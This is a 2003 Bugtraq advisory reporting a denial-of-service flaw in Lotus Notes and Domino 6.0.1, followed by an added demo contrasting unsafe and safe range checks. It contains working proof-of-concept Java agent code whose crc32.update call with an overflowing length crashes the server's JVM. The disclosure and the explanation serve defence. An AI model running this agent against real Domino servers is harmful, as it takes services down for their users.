Java Agent freezes Lotus Notes and Domino 6.0.1

From: Marc Schoenefeld (schonef@uni-muenster.de)
Date: 04/05/03

    Date: Sat, 5 Apr 2003 23:48:50 +0200 (MES)
    From: Marc Schoenefeld <schonef@uni-muenster.de>
    To: bugtraq@securityfocus.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hi,

    the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
    and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
    is not freed and causes the server machine (observed on MS XP) to
    deny further service.

    IMPLICATIONS
    - - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
    - - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.

    ANALYSIS:
    The call to the "update" method of the CRC32 raises an integer overflow
    in the Java java.util.zip.* core libraries, which triggers a JNI routine
    that cannot handle the extremely high input value.

    HISTORY:
    This vulnerability has already been detected in the Sun JDK
    (http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
    and was disclosed at Blackhat Windows 2003.
    The background of this bug is described at www.illegalaccess.org.

    Sincerely
    Marc Schoenefeld

    =========================Agent Source Code===========================
    import lotus.domino.*;
    import java.util.zip.*;

    public class JavaAgent extends AgentBase {

        public void NotesMain() {

            try {
                Session session = getSession();
                AgentContext agentContext = session.getAgentContext();

                // Empty array, offset 4, length 0x7ffffffc: the call named in ANALYSIS
                CRC32 crc32 = new CRC32();
                crc32.update(new byte[0], 4, 0x7ffffffc);

                // (Your code goes here)

            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    =========================Agent Source Code===========================

    - --

    Never be afraid to try something new. Remember, amateurs built the
    ark; professionals built the Titanic. -- Anonymous

    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (AIX)
    Comment: For info see http://www.gnupg.org

    iD8DBQE+j09FqCaQvrKNUNQRAs9uAJ4unAFEKqqRuk4gBlkNSKQ5rTMa0wCfVzC+
    iJHcqblX8QE7UaPofUrKU3Y=
    =l93r
    -----END PGP SIGNATURE-----
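The integer overflow named in the ANALYSIS section, shown as an added example that is not part of the original post and not the JDK's or IBM's source: with offset 4 and length 0x7ffffffc, the sum wraps to a negative 32-bit value, so a range check written as `off + len <= b.length` accepts the call, while the rearranged form `off <= b.length - len` rejects it. The class name, both helper methods and the test rows are assumptions made for illustration.

```java
// Added illustration: a range check that wraps versus one that cannot.
public class RangeCheckDemo {

    // Hypothetical naive check (not taken from any JDK source):
    // off + len is computed in 32-bit int and can wrap to a negative value.
    static boolean naiveInBounds(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off + len <= b.length;
    }

    // Overflow-safe form: once len >= 0, b.length - len cannot wrap.
    static boolean safeInBounds(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off <= b.length - len;
    }

    public static void main(String[] args) {
        // Constructed test rows: { buffer length, off, len }.
        int[][] cases = {
            { 0, 4, 0x7ffffffc },          // the arguments from the post
            { 0, 1, Integer.MAX_VALUE },   // another wrapping pair
            { 16, 4, 12 },                 // exactly fits
            { 16, 4, 13 },                 // one byte too long
            { 16, -1, 1 },                 // negative offset
            { 0, 0, 0 },                   // empty range on empty buffer
        };
        System.out.printf("%-6s %-4s %-11s %-12s %-6s %-6s%n",
                "buflen", "off", "len", "off+len", "naive", "safe");
        for (int[] c : cases) {
            byte[] b = new byte[c[0]];
            int off = c[1];
            int len = c[2];
            int wrapped = off + len; // same 32-bit arithmetic as the naive check
            System.out.printf("%-6d %-4d 0x%08x  %-12d %-6b %-6b%n",
                    b.length, off, len, wrapped,
                    naiveInBounds(b, off, len), safeInBounds(b, off, len));
        }
    }
}
```

The first two rows are the only ones where the two checks disagree: the naive form accepts them, the safe form rejects them.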

